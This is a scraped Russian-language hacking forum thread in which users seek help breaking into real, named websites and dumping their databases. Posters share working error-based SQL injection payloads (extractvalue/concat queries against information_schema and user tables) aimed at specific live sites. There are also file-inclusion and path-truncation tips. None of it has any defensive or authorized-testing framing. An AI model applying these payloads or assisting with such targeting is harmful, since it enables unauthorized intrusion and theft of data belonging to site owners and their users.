Картинка же удаленная инжектится же www.Сайт.com/index.php?Id=pages&pages=<img src='https://forum.antichat.ru/data/avatars/m/79/79637.jpg?1427794803' alt='5' />%00 Через теги коды выполняются,кроме php
Всем привет пользователям. Есть ли тут такие "users" которые научат меня сливать БД с разных сайтов(и всё объяснит)? Очень буду благодарен!
Тут во втором примере ошибка? http://2sql.ru/novosti/sql-limit/ SELECT UniversityName FROM Universities LIMIT 4, 6 не даст 4 5 6 запись? Типо покажи 6 записеи начиная с 4? А 4 это 5 потому что нумерация начинается с 0.Я прав?
В одном сайте,который на Yii 1.1.14 в text=1'&type=0&view=search ( где кавычка ) можно крутить . Только вот не понимаю какие запросы составлять . Есть желающие помочь? PHP Version 4.4.45 Curl 7.19.7 OpenSSL 1.0.1e-fips 11 Feb 2013 MySQL 5.1.59 --------------------------------------- Стандартная ошибка CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near и.т.д
Всем привет. Лет пять не пользовала SQL инъекции, подзабыла все Есть инъект вида http://сайт.ru/korzina'/ Извергает ошибку: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''korzina'' LIMIT 0, 1' at line 1 - SELECT * FROM `tehnocity_menu` WHERE `sim_link`='korzina'' LIMIT 0, 1 Но как бы я дальше не ковыряла, ничего толком не выходит. Направьте в какую сторону копать. Что пробовала: Втыкала Юнион. Не проскакивает. Такое впечатление, что -- не отрабатывает вообще. Не отбрасывается хвост запроса хоть убей. В общем на вас вся надежда Вот пример http://stylesosh.ru/Orangevaya-tolstovka'/ Вот сайт на той же CMS и другой дырявый скрипт http://www.pulverisator.ru/Trubki/?orderby=pric'e&par=dec
Спасибо! В целом вижу, что работает, но никогда не пользовалась extractvalue. Как мне подставить запрос сюда? Если вместо version(), то пишет Only constant XPATH queries are supported
Ребята, как листать записи при такой инъекции? Что то совсем не получается http://stylesosh.ru/Orangevaya-tols...cat(name),1,1024)from(tehnocity_user))))and'/ XPATH syntax error: ':quest,' - SELECT * FROM `tehnocity_menu` WHERE `sim_link`='Orangevaya-tolstovka'and+extractvalue(2,concat(0x3a,(select+mid(group_concat(name),1,1024)from(tehnocity_user))))and'' LIMIT 0, 1 Ясно как листать.. Там всего один юзер в этой таблице(((( /Orangevaya-tolstovka'and+extractvalue(1,concat(0x3a,(select+mid(group_concat (user_id,0x3a,name,0x3a),1,1024)from(users)where(user_id)=(1))))and'/
http://stylesosh.ru/Orangevaya-tolstovka'and+extractvalue(1,concat(0x3a,(select+mid(group_concat(0x3a,table_name,0x3a),1,1024)from(information_schema.tables))))and'/ Не пропускает точку((((((( Как быть????? Хексить пробовала, не выходит. Посоветуйте пожалуйста. Попробовала сбрутить таблицы по словарю с античата.. Ничего нормального не удалось вытащить((
Что можно сделать с этим сайтом? http://hotel-stalingrad.ru/index.php?page=cafe У меня ничего не получается,кто подскажет с чего раскрутить можно?
null-byte там не работает, можно попробовать расширение отбросить через кучу слешей(2048/4096/etc), влом линк искать
